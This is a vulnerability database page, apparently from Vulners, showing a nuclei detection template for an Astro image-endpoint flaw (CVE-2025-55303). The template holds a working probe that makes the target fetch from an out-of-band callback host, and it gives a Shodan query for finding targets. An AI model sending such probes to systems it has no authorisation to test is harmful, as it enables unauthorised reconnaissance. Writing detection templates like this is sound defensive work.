Lucene search
K

Astro - Unauthorized Third-Party Image Access

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Astro versions 5.13.2 and 4.16.18 expose images from unauthorized domains via faulty optimization URL validation.

Related
Refs
Code
id: CVE-2025-55303

info:
  name: Astro - Unauthorized Third-Party Image Access
  author: theamanrawat
  severity: medium
  description: |
    Astro < 5.13.2 and < 4.16.18 contains an information disclosure vulnerability caused by improper validation of protocol-relative URLs in the image optimization endpoint, letting attackers serve images from unauthorized third-party domains, exploit requires on-demand rendering deployment.
  impact: |
    Attackers can serve images from unauthorized third-party domains, potentially leading to information disclosure or content spoofing.
  remediation: |
    Update to versions 5.13.2 or 4.16.18 or later.
  reference:
    - https://github.com/advisories/GHSA-xf8x-j4p2-f749
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55303
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
    cvss-score: 6.4
    cve-id: CVE-2025-55303
    epss-score: 0.00599
    epss-percentile: 0.44388
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"astro"
  tags: cve,cve2025,astro,ssrf,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/_image?href=//{{interactsh-url}}/600x400"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'interactsh_protocol == "http"'
          - 'contains(header, "image/")'
        condition: and
# digest: 4a0a00473045022075f3fe14ff4c39ef43343b93a3f135b4704c8005466cf6cdf9b364363fea9f3402210089eb72ead9c0eb0bc64ccbb539d4fb2a0d1cfc8ec374a740f11cc64d466c8c7a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.1
CVSS 46.9
EPSS0.00599
SSVC
15